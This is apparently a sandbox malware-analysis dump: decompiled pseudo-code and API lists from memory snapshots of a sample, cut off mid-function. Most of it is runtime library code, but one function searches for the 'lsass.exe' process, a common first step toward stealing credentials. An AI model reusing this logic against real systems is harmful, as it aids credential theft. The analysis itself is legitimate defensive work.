    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1689369576.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000002.1689363080.00F60000.00000002.sdmp
    • Associated: 00000005.00000002.1689377239.00F68000.00000002.sdmp
    • Associated: 00000005.00000002.1689384429.00F6B000.00000004.sdmp
    • Associated: 00000005.00000002.1689391890.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_f60000_F915.jbxd
    Function 00F63168, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26
    C-Code - Quality: 68%
    			E00F63168(signed short* __esi) {
				void* _t10;

				_t10 = 0;
				if(__esi != 0) {
					_push(( *__esi & 0x0000ffff) + 2);
					_push(0x40);
					_t10 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), "LocalAlloc"))();
					if(_t10 != 0) {
						E00F668B0(_t10, __esi[2],  *__esi & 0x0000ffff);
					}
				}
				return _t10;
			}




    0x00f63169
    0x00f6316d
    0x00f63175
    0x00f63176
    0x00f63191
    0x00f63195
    0x00f6319f
    0x00f631a4
    0x00f63195
    0x00f631aa

    APIs
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,-00000002,00F69BE0,00F6323C), ref: 00F63182
    • GetProcAddress.KERNEL32(00000000), ref: 00F63189
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F61FA9, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25
    C-Code - Quality: 50%
    			E00F61FA9(void* __edi, void* __esi) {
				signed int _t6;
				signed int _t10;
				void* _t13;

				_t13 = __esi;
				_t6 = 0;
				if(__edi != 0 && __esi != 0) {
					_t2 = _t13 + 2; // 0x100000013
					_push(__esi + _t2);
					_push(0x40);
					_t6 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), "LocalAlloc"))();
					if(0 != 0) {
						_t10 = 0;
						if(__esi != 0) {
							do {
								 *((short*)(0 + _t10 * 2)) =  *((char*)(_t10 + __edi));
								_t10 = _t10 + 1;
							} while (_t10 < __esi);
						}
					}
				}
				return _t6;
			}






    0x00f61fa9
    0x00f61fa9
    0x00f61fad
    0x00f61fb3
    0x00f61fb7
    0x00f61fb8
    0x00f61fd1
    0x00f61fd5
    0x00f61fd7
    0x00f61fdb
    0x00f61fdd
    0x00f61fe2
    0x00f61fe6
    0x00f61fe7
    0x00f61fdd
    0x00f61fdb
    0x00f61fd5
    0x00f61feb

    APIs
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,0000000100000013,00F61ABB), ref: 00F61FC4
    • GetProcAddress.KERNEL32(00000000), ref: 00F61FCB
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F64CE6, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
    C-Code - Quality: 100%
    			E00F64CE6(intOrPtr _a4) {
				struct HINSTANCE__* _t2;

				_t2 = GetModuleHandleW(L"mscoree.dll");
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t2, "CorExitProcess");
					if(_t2 != 0) {
						return _t2->i(_a4);
					}
				}
				return _t2;
			}




    0x00f64cf0
    0x00f64cf8
    0x00f64d00
    0x00f64d08
    0x00000000
    0x00f64d0d
    0x00f64d08
    0x00f64d10

    APIs
    • GetModuleHandleW.KERNEL32(mscoree.dll,?,00F64D1E,00000000,?,00F6780B,000000FF,0000001E,00000001,00000000,00000000,?,00F66195,00000000,00000001,00000000), ref: 00F64CF0
    • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,00F64D1E,00000000,?,00F6780B,000000FF,0000001E,00000001,00000000,00000000,?,00F66195,00000000,00000001), ref: 00F64D00
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F63EB9, Relevance: 6.2, APIs: 4, Instructions: 159
    C-Code - Quality: 91%
    			E00F63EB9(void* __ecx, void* __edx, void* __eflags, int _a4, int _a8) {
				signed int _v8;
				char _v21;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				int _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t53;
				int _t56;
				signed char _t59;
				int _t61;
				short* _t62;
				signed int _t66;
				signed char* _t78;
				signed int _t81;
				int _t82;
				signed int _t85;
				intOrPtr* _t86;
				int _t91;
				signed char _t92;
				signed int _t93;
				int _t95;
				int _t97;
				signed int _t98;
				signed int _t101;
				intOrPtr* _t104;
				signed int _t105;

				_t53 =  *0xf6b940; // 0xbb40e64e
				_v8 = _t53 ^ _t105;
				_t82 = _a8;
				_t97 = E00F63E3D(_a4);
				_t100 = 0;
				_a4 = _t97;
				if(_t97 != 0) {
					_v32 = 0;
					_t56 = 0;
					__eflags = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t56 + 0xf6b438)) - _t97;
						if( *((intOrPtr*)(_t56 + 0xf6b438)) == _t97) {
							break;
						}
						_v32 = _v32 + 1;
						_t56 = _t56 + 0x30;
						__eflags = _t56 - 0xf0;
						if(_t56 < 0xf0) {
							continue;
						} else {
							__eflags = _t97 - 0xfde8;
							if(_t97 == 0xfde8) {
								L35:
								_t64 = _t56 | 0xffffffff;
								__eflags = _t56 | 0xffffffff;
							} else {
								__eflags = _t97 - 0xfde9;
								if(_t97 == 0xfde9) {
									goto L35;
								} else {
									_t56 = IsValidCodePage(_t97 & 0x0000ffff);
									__eflags = _t56;
									if(_t56 == 0) {
										goto L35;
									} else {
										_t56 = GetCPInfo(_t97,  &_v28);
										__eflags = _t56;
										if(_t56 == 0) {
											__eflags =  *0xf6bfcc - _t100; // 0x0
											if(__eflags != 0) {
												goto L1;
											} else {
												goto L35;
											}
										} else {
											E00F65BA0(_t82 + 0x1c, _t100, 0x101);
											_t95 = 1;
											 *(_t82 + 4) = _t97;
											 *(_t82 + 0xc) = _t100;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t82 + 8) = _t100;
											} else {
												__eflags = _v22;
												if(_v22 != 0) {
													_t104 =  &_v21;
													while(1) {
														_t92 =  *_t104;
														__eflags = _t92;
														if(_t92 == 0) {
															goto L29;
														}
														_t81 =  *(_t104 - 1) & 0x000000ff;
														_t93 = _t92 & 0x000000ff;
														while(1) {
															__eflags = _t81 - _t93;
															if(_t81 > _t93) {
																break;
															}
															 *(_t82 + _t81 + 0x1d) =  *(_t82 + _t81 + 0x1d) | 0x00000004;
															_t81 = _t81 + 1;
															__eflags = _t81;
														}
														_t104 = _t104 + 2;
														__eflags =  *(_t104 - 1);
														if( *(_t104 - 1) != 0) {
															continue;
														}
														goto L29;
													}
												}
												L29:
												_t78 = _t82 + 0x1e;
												_t91 = 0xfe;
												do {
													 *_t78 =  *_t78 | 0x00000008;
													_t78 =  &(_t78[1]);
													_t91 = _t91 - 1;
													__eflags = _t91;
												} while (_t91 != 0);
												 *(_t82 + 0xc) = E00F63B76( *(_t82 + 4));
												 *(_t82 + 8) = _t95;
											}
											_t97 = _t82 + 0x10;
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L25:
											_t100 = _t82;
											E00F63C09(_t82);
											goto L2;
										}
									}
								}
							}
						}
						goto L36;
					}
					E00F65BA0(_t82 + 0x1c, _t100, 0x101);
					_t85 = _v32 * 0x30;
					_v36 = _t100;
					_t101 = _t85 + 0xf6b448;
					_v32 = _t101;
					while(1) {
						L21:
						__eflags =  *_t101;
						if( *_t101 == 0) {
							break;
						}
						_t59 =  *(_t101 + 1);
						__eflags = _t59;
						if(_t59 != 0) {
							_t98 =  *_t101 & 0x000000ff;
							_t66 = _t59 & 0x000000ff;
							while(1) {
								__eflags = _t98 - _t66;
								if(_t98 > _t66) {
									break;
								}
								 *(_t82 + _t98 + 0x1d) =  *(_t82 + _t98 + 0x1d) |  *(_v36 + 0xf6b434);
								_t66 =  *(_t101 + 1) & 0x000000ff;
								_t98 = _t98 + 1;
								__eflags = _t98;
							}
							_t97 = _a4;
							_t101 = _t101 + 2;
							__eflags = _t101;
							continue;
						}
						break;
					}
					_v36 = _v36 + 1;
					_t101 = _v32 + 8;
					__eflags = _v36 - 4;
					_v32 = _t101;
					if(_v36 < 4) {
						goto L21;
					}
					 *(_t82 + 4) = _t97;
					 *(_t82 + 8) = 1;
					_t61 = E00F63B76(_t97);
					 *(_t82 + 0xc) = _t61;
					_t62 = _t82 + 0x10;
					_t86 = _t85 + 0xf6b43c;
					_t95 = 6;
					do {
						 *_t62 =  *_t86;
						_t86 = _t86 + 2;
						_t62 = _t62 + 2;
						_t95 = _t95 - 1;
						__eflags = _t95;
					} while (_t95 != 0);
					goto L25;
				} else {
					L1:
					E00F63BA5(_t82);
					L2:
					_t64 = 0;
				}
				L36:
				return E00F65F8E(_t64, _t82, _v8 ^ _t105, _t95, _t97, _t100);
			}
































    0x00f63ec1
    0x00f63ec8
    0x00f63ecc
    0x00f63ed9
    0x00f63edb
    0x00f63edd
    0x00f63ee2
    0x00f63ef2
    0x00f63ef5
    0x00f63ef5
    0x00f63ef7
    0x00f63ef7
    0x00f63efd
    0x00000000
    0x00000000
    0x00f63f03
    0x00f63f06
    0x00f63f09
    0x00f63f0e
    0x00000000
    0x00f63f10
    0x00f63f10
    0x00f63f16
    0x00f64090
    0x00f64090
    0x00f64090
    0x00f63f1c
    0x00f63f1c
    0x00f63f22
    0x00000000
    0x00f63f28
    0x00f63f2c
    0x00f63f32
    0x00f63f34
    0x00000000
    0x00f63f3a
    0x00f63f3f
    0x00f63f45
    0x00f63f47
    0x00f64084
    0x00f6408a
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00f63f4d
    0x00f63f57
    0x00f63f5e
    0x00f63f62
    0x00f63f65
    0x00f63f68
    0x00f63f6b
    0x00f6406d
    0x00f63f71
    0x00f63f71
    0x00f63f75
    0x00f63f7b
    0x00f63f7e
    0x00f63f7e
    0x00f63f80
    0x00f63f82
    0x00000000
    0x00000000
    0x00f63f88
    0x00f63f8c
    0x00f6403d
    0x00f6403d
    0x00f6403f
    0x00000000
    0x00000000
    0x00f64037
    0x00f6403c
    0x00f6403c
    0x00f6403c
    0x00f64041
    0x00f64044
    0x00f64048
    0x00000000
    0x00000000
    0x00000000
    0x00f64048
    0x00f63f7e
    0x00f6404e
    0x00f6404e
    0x00f64051
    0x00f64056
    0x00f64056
    0x00f64059
    0x00f6405a
    0x00f6405a
    0x00f6405a
    0x00f64065
    0x00f64068
    0x00f64068
    0x00f6407c
    0x00f6407f
    0x00f64080
    0x00f64081
    0x00f6402b
    0x00f6402b
    0x00f6402d
    0x00000000
    0x00f6402d
    0x00f63f47
    0x00f63f34
    0x00f63f22
    0x00f63f16
    0x00000000
    0x00f63f0e
    0x00f63f9e
    0x00f63fa9
    0x00f63fac
    0x00f63faf
    0x00f63fb5
    0x00f63fe5
    0x00f63fe5
    0x00f63fe5
    0x00f63fe8
    0x00000000
    0x00000000
    0x00f63fba
    0x00f63fbd
    0x00f63fbf
    0x00f63fc1
    0x00f63fc4
    0x00f63fdb
    0x00f63fdb
    0x00f63fdd
    0x00000000
    0x00000000
    0x00f63fd2
    0x00f63fd6
    0x00f63fda
    0x00f63fda
    0x00f63fda
    0x00f63fdf
    0x00f63fe2
    0x00f63fe2
    0x00000000
    0x00f63fe2
    0x00000000
    0x00f63fbf
    0x00f63fed
    0x00f63ff0
    0x00f63ff3
    0x00f63ff7
    0x00f63ffa
    0x00000000
    0x00000000
    0x00f63ffe
    0x00f64001
    0x00f64008
    0x00f6400f
    0x00f64012
    0x00f64015
    0x00f6401b
    0x00f6401c
    0x00f6401f
    0x00f64022
    0x00f64025
    0x00f64028
    0x00f64028
    0x00f64028
    0x00000000
    0x00f63ee4
    0x00f63ee4
    0x00f63ee6
    0x00f63eeb
    0x00f63eeb
    0x00f63eeb
    0x00f64093
    0x00f640a1

    APIs
      • Part of subcall function 00F63E3D: GetOEMCP.KERNEL32 ref: 00F63E66
      • Part of subcall function 00F63E3D: GetACP.KERNEL32 ref: 00F63E89
    • IsValidCodePage.KERNEL32(-00000030), ref: 00F63F2C
    • GetCPInfo.KERNEL32(00000000,?), ref: 00F63F3F
    • setSBUpLow.LIBCMT ref: 00F6402D
      • Part of subcall function 00F63C09: GetCPInfo.KERNEL32(?,?), ref: 00F63C2A
      • Part of subcall function 00F63C09: ___crtGetStringTypeA.LIBCMT ref: 00F63CA7
      • Part of subcall function 00F63C09: ___crtLCMapStringA.LIBCMT ref: 00F63CC7
      • Part of subcall function 00F63C09: ___crtLCMapStringA.LIBCMT ref: 00F63CEC
    • setSBCS.LIBCMT ref: 00F63EE6
      • Part of subcall function 00F65F8E: IsDebuggerPresent.KERNEL32 ref: 00F67957
      • Part of subcall function 00F65F8E: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F6796C
      • Part of subcall function 00F65F8E: UnhandledExceptionFilter.KERNEL32(00F698EC), ref: 00F67977
      • Part of subcall function 00F65F8E: GetCurrentProcess.KERNEL32(C0000409), ref: 00F67993
      • Part of subcall function 00F65F8E: TerminateProcess.KERNEL32(00000000), ref: 00F6799A
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F645D9, Relevance: 6.0, APIs: 4, Instructions: 50
    C-Code - Quality: 58%
    			E00F645D9() {
				signed int _t3;
				long _t4;
				struct _CRITICAL_SECTION* _t5;
				struct _CRITICAL_SECTION* _t14;
				signed int* _t17;
				struct _CRITICAL_SECTION** _t18;

				_t3 =  *0xf6b774; // 0xffffffff
				if(_t3 != 0xffffffff) {
					__imp__DecodePointer( *0xf6bff4, _t3);
					 *_t3();
					 *0xf6b774 =  *0xf6b774 | 0xffffffff;
				}
				_t4 =  *0xf6b778; // 0xffffffff
				if(_t4 != 0xffffffff) {
					TlsFree(_t4);
					 *0xf6b778 =  *0xf6b778 | 0xffffffff;
				}
				_t17 = 0xf6b948;
				do {
					_t14 =  *_t17;
					if(_t14 != 0 && _t17[1] != 1) {
						DeleteCriticalSection(_t14);
						E00F6614A(_t14);
						 *_t17 =  *_t17 & 0x00000000;
					}
					_t17 =  &(_t17[2]);
				} while (_t17 < 0xf6ba68);
				_t18 = 0xf6b948;
				do {
					_t5 =  *_t18;
					if(_t5 != 0 && _t18[1] == 1) {
						DeleteCriticalSection(_t5);
					}
					_t18 =  &(_t18[2]);
				} while (_t18 < 0xf6ba68);
				return _t5;
			}









    0x00f645d9
    0x00f645e1
    0x00f645ea
    0x00f645f0
    0x00f645f2
    0x00f645f2
    0x00f645f9
    0x00f64601
    0x00f64604
    0x00f6460a
    0x00f6460a
    0x00f65ff1
    0x00f65ff7
    0x00f65ff7
    0x00f65ffb
    0x00f66004
    0x00f66007
    0x00f6600c
    0x00f6600f
    0x00f66010
    0x00f66013
    0x00f6601b
    0x00f66021
    0x00f66021
    0x00f66025
    0x00f6602e
    0x00f6602e
    0x00f66030
    0x00f66033
    0x00f6603d

    APIs
    • DecodePointer.KERNEL32(FFFFFFFF,00F64A02,?,00F63A8B,00F69DC8,00000014), ref: 00F645EA
    • TlsFree.KERNEL32(FFFFFFFF,00F64A02,?,00F63A8B,00F69DC8,00000014), ref: 00F64604
    • DeleteCriticalSection.KERNEL32(00000000,00000000,0000A47E,?,00F64A02,?,00F63A8B,00F69DC8,00000014), ref: 00F66004
      • Part of subcall function 00F6614A: HeapFree.KERNEL32(00000000,00000000,?,00F64734,00000000,?,?,00F6474B,?,00F63785), ref: 00F66160
      • Part of subcall function 00F6614A: GetLastError.KERNEL32(00000000,?,00F64734,00000000,?,?,00F6474B,?,00F63785), ref: 00F66172
    • DeleteCriticalSection.KERNEL32(FFFFFFFF,0000A47E,?,00F64A02,?,00F63A8B,00F69DC8,00000014), ref: 00F6602E
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F63D99, Relevance: 6.0, APIs: 4, Instructions: 47
    C-Code - Quality: 81%
    			E00F63D99(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0xf69de8);
				E00F65910(__ebx, __edi, __esi);
				_t31 = E00F64743(__ebx, __edx, _t35);
				_t15 =  *0xf6b528; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00F66117(_t25, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0xf6b430; // 0xf6b008
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0xf6b008;
								if(__eflags != 0) {
									E00F6614A(_t33);
								}
							}
						}
						_t21 =  *0xf6b430; // 0xf6b008
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0xf6b430; // 0xf6b008
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00F63E34();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					_push(0x20);
					E00F64FB3(_t29, _t38);
				}
				return E00F65955(_t33);
			}









    0x00f63d99
    0x00f63d99
    0x00f63d99
    0x00f63d99
    0x00f63d9b
    0x00f63da0
    0x00f63daa
    0x00f63dac
    0x00f63db4
    0x00f63dd5
    0x00f63ddb
    0x00f63ddf
    0x00f63de2
    0x00f63de5
    0x00f63deb
    0x00f63ded
    0x00f63def
    0x00f63df8
    0x00f63dfa
    0x00f63dfc
    0x00f63e02
    0x00f63e05
    0x00f63e0a
    0x00f63e02
    0x00f63dfa
    0x00f63e0b
    0x00f63e10
    0x00f63e13
    0x00f63e19
    0x00f63e1d
    0x00f63e1d
    0x00f63e23
    0x00f63e2a
    0x00f63dbc
    0x00f63dbc
    0x00f63dbc
    0x00f63dbf
    0x00f63dc1
    0x00f63dc3
    0x00f63dc5
    0x00f63dca
    0x00f63dd2

    APIs
    • __getptd.LIBCMT ref: 00F63DA5
      • Part of subcall function 00F64743: __amsg_exit.LIBCMT ref: 00F64753
    • __amsg_exit.LIBCMT ref: 00F63DC5
      • Part of subcall function 00F66117: __amsg_exit.LIBCMT ref: 00F66139
      • Part of subcall function 00F66117: EnterCriticalSection.KERNEL32(?,?,?,00F64660,0000000D), ref: 00F66141
    • InterlockedDecrement.KERNEL32(?,00F69DE8,0000000C,00F637CD), ref: 00F63DF2
      • Part of subcall function 00F6614A: HeapFree.KERNEL32(00000000,00000000,?,00F64734,00000000,?,?,00F6474B,?,00F63785), ref: 00F66160
      • Part of subcall function 00F6614A: GetLastError.KERNEL32(00000000,?,00F64734,00000000,?,?,00F6474B,?,00F63785), ref: 00F66172
    • InterlockedIncrement.KERNEL32(00F6B008,00F69DE8,0000000C,00F637CD), ref: 00F63E1D
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F646CA, Relevance: 6.0, APIs: 4, Instructions: 45
    C-Code - Quality: 58%
    			E00F646CA(void* __ebx) {
				void* __edi;
				void* __esi;
				long _t3;
				long* _t7;
				void* _t8;
				long _t11;
				long _t18;
				long* _t19;

				_t3 = GetLastError();
				_push( *0xf6b774);
				_t18 = _t3;
				_t19 =  *((intOrPtr*)(E00F645A5()))();
				if(_t19 == 0) {
					_t7 = E00F661C9(1, 0x214);
					_t19 = _t7;
					if(_t19 != 0) {
						__imp__DecodePointer( *0xf6bff0,  *0xf6b774, _t19);
						_t8 =  *_t7();
						_t22 = _t8;
						if(_t8 == 0) {
							E00F6614A(_t19);
							_t19 = 0;
							__eflags = 0;
						} else {
							_push(0);
							_push(_t19);
							E00F64616(__ebx, _t18, _t19, _t22);
							_t11 = GetCurrentThreadId();
							_t19[1] = _t19[1] | 0xffffffff;
							 *_t19 = _t11;
						}
					}
				}
				SetLastError(_t18);
				return _t19;
			}











    0x00f646ce
    0x00f646d4
    0x00f646da
    0x00f646e3
    0x00f646e7
    0x00f646f0
    0x00f646f5
    0x00f646fb
    0x00f6470a
    0x00f64710
    0x00f64712
    0x00f64714
    0x00f6472f
    0x00f64735
    0x00f64735
    0x00f64716
    0x00f64716
    0x00f64718
    0x00f64719
    0x00f64720
    0x00f64726
    0x00f6472a
    0x00f6472a
    0x00f64714
    0x00f646fb
    0x00f64738
    0x00f64742

    APIs
    • GetLastError.KERNEL32(?,?,00F6474B,?,00F63785), ref: 00F646CE
      • Part of subcall function 00F645A5: TlsGetValue.KERNEL32(?,00F646E1,?,?,00F6474B,?,00F63785), ref: 00F645AE
      • Part of subcall function 00F645A5: DecodePointer.KERNEL32(?,00F646E1,?,?,00F6474B,?,00F63785), ref: 00F645C0
      • Part of subcall function 00F645A5: TlsSetValue.KERNEL32(00000000,?,00F646E1,?,?,00F6474B,?,00F63785), ref: 00F645CF
    • SetLastError.KERNEL32(00000000,?,?,00F6474B,?,00F63785), ref: 00F64738
      • Part of subcall function 00F661C9: Sleep.KERNEL32(00000000), ref: 00F661F1
    • DecodePointer.KERNEL32(00000000,?,?,00F6474B,?,00F63785), ref: 00F6470A
    • GetCurrentThreadId.KERNEL32(?,?,00F6474B,?,00F63785), ref: 00F64720
      • Part of subcall function 00F6614A: HeapFree.KERNEL32(00000000,00000000,?,00F64734,00000000,?,?,00F6474B,?,00F63785), ref: 00F66160
      • Part of subcall function 00F6614A: GetLastError.KERNEL32(00000000,?,00F64734,00000000,?,?,00F6474B,?,00F63785), ref: 00F66172
      • Part of subcall function 00F64616: GetModuleHandleW.KERNEL32(KERNEL32.DLL,00F69E48,00000008,00F6471E,00000000,00000000,?,?,00F6474B,?,00F63785), ref: 00F64627
      • Part of subcall function 00F64616: InterlockedIncrement.KERNEL32(00F6B008), ref: 00F64668
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F61982, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45
    C-Code - Quality: 40%
    			E00F61982(void* _a4) {
				void* _v12;
				void* _v16;
				void* _v20;
				char _v24;
				void* __esi;
				intOrPtr _t21;
				void* _t25;
				intOrPtr* _t27;

				_v24 =  &_v12;
				_v20 = _a4;
				_t25 = 0;
				_v16 = 0;
				RtlInitUnicodeString( &_v12, L"lsass.exe");
				_a4 = 0;
				if(E00F618D9( &_a4, 5) >= 0) {
					_t27 = _a4;
					_push( &_v24);
					_push(_t27);
					while(E00F6194B() != 0) {
						_t21 =  *_t27;
						if(_t21 != _t25) {
							_t27 = _t27 + _t21;
							_push( &_v24);
							_push(_t27);
							continue;
						}
						break;
					}
					LocalFree(_a4);
					_t25 = _v16;
				}
				return _t25;
			}











    0x00f6198c
    0x00f61993
    0x00f6199e
    0x00f619a1
    0x00f619a4
    0x00f619af
    0x00f619ba
    0x00f619bc
    0x00f619c2
    0x00f619c3
    0x00f619d3
    0x00f619c6
    0x00f619ca
    0x00f619cc
    0x00f619d1
    0x00f619d2
    0x00000000
    0x00f619d2
    0x00000000
    0x00f619ca
    0x00f619df
    0x00f619e5
    0x00f619e5
    0x00f619ed

    APIs
    • RtlInitUnicodeString.NTDLL(?,lsass.exe), ref: 00F619A4
      • Part of subcall function 00F618D9: NtQuerySystemInformation.NTDLL(00000000,00000000,00000000,00000000,00000000,00F619B7,00000005), ref: 00F618EE
      • Part of subcall function 00F618D9: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00001000,?,00000000,00F619B7,00000005), ref: 00F6190B
      • Part of subcall function 00F618D9: GetProcAddress.KERNEL32(00000000,?,00000000,00F619B7,00000005), ref: 00F61912
      • Part of subcall function 00F618D9: NtQuerySystemInformation.NTDLL(?,00000000,00001000,00000000,?,00000000,00F619B7,00000005), ref: 00F61928
      • Part of subcall function 00F618D9: LocalFree.KERNEL32(?,?,00000000,00F619B7,00000005), ref: 00F61936
      • Part of subcall function 00F6194B: RtlEqualUnicodeString.NTDLL(?,?,00000001,00000000,?,00F619D8,?,?), ref: 00F6195D
    • LocalFree.KERNEL32(?,?,?), ref: 00F619DF
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F64616, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40
    C-Code - Quality: 91%
    			E00F64616(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t26;
				intOrPtr _t30;
				intOrPtr _t39;
				void* _t40;

				_t31 = __ebx;
				_push(8);
				_push(0xf69e48);
				E00F65910(__ebx, __edi, __esi);
				GetModuleHandleW(L"KERNEL32.DLL");
				_t39 =  *((intOrPtr*)(_t40 + 8));
				 *((intOrPtr*)(_t39 + 0x5c)) = 0xf68fc8;
				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
				 *((intOrPtr*)(_t39 + 0x14)) = 1;
				 *((intOrPtr*)(_t39 + 0x70)) = 1;
				 *((char*)(_t39 + 0xc8)) = 0x43;
				 *((char*)(_t39 + 0x14b)) = 0x43;
				 *(_t39 + 0x68) = 0xf6b008;
				E00F66117(__ebx, 1, 0xd);
				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
				InterlockedIncrement( *(_t39 + 0x68));
				 *(_t40 - 4) = 0xfffffffe;
				E00F646B8();
				E00F66117(_t31, 1, 0xc);
				 *(_t40 - 4) = 1;
				_t26 =  *((intOrPtr*)(_t40 + 0xc));
				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
				if(_t26 == 0) {
					_t30 =  *0xf6b770; // 0xf6b698
					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
				}
				E00F6425A( *((intOrPtr*)(_t39 + 0x6c)));
